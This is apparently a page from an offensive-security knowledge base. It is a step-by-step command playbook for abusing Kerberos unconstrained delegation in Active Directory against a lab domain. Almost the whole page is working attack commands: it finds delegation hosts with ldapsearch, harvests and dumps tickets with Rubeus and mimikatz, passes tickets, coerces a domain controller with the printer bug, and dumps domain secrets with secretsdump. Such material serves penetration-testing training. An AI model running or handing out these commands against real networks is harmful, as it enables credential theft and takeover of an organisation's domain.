Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Delegation / Unconstrained

Attack

Unconstrained delegation is abused by compromising a host configured with TRUSTED_FOR_DELEGATION, then extracting delegated TGTs from memory when users or computers authenticate to services on that host.

Find targets

ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' sAMAccountName dNSHostName servicePrincipalName
findDelegation.py ootw.local/student:'student' -dc-ip 10.10.10.200

Monitor for tickets on the compromised delegated host

Rubeus.exe monitor /interval:5 /nowrap
Rubeus.exe monitor /interval:5 /nowrap /targetuser:Administrator

Dump cached tickets

Rubeus.exe dump /nowrap
Rubeus.exe dump /luid:0x3e7 /service:krbtgt /nowrap
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Inject captured ticket

Rubeus.exe ptt /ticket:<BASE64_TICKET>
klist
dir \\dc01.ootw.local\c$

Coerce a high-value computer to authenticate

SharpSpoolTrigger.exe dc01.ootw.local delegated-host.ootw.local

PrinterBug from Linux

printerbug.py ootw.local/student:'student'@dc01.ootw.local delegated-host.ootw.local

Use captured ticket from Linux after conversion

ticketConverter.py captured.kirbi captured.ccache
export KRB5CCNAME=./captured.ccache
klist
secretsdump.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200

Notes

Domain controllers are configured for unconstrained delegation by design. They are not the finding. Non-DC servers with unconstrained delegation are the dangerous targets.

The cleanest path is host compromise, ticket monitoring, authentication coercion, ticket injection, then service access as the captured principal.